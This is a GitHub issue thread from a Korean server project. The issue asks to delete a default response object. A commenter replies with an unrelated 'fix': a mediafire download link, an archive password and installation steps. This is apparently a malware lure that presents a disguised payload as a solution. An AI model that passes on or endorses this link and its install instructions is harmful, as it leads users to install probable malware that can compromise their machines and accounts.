### ISSUE TITLE
[Fix] 기본 응답 객체 삭제

### ISSUE THREAD

**Issue by ajung7038** [APPS-sookmyung/2024-WELLET-Server#77]
## 📌 Issue

기본 응답 객체 삭제

---

## 📌 TODO
* [ ] 기본 응답 객체 삭제

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
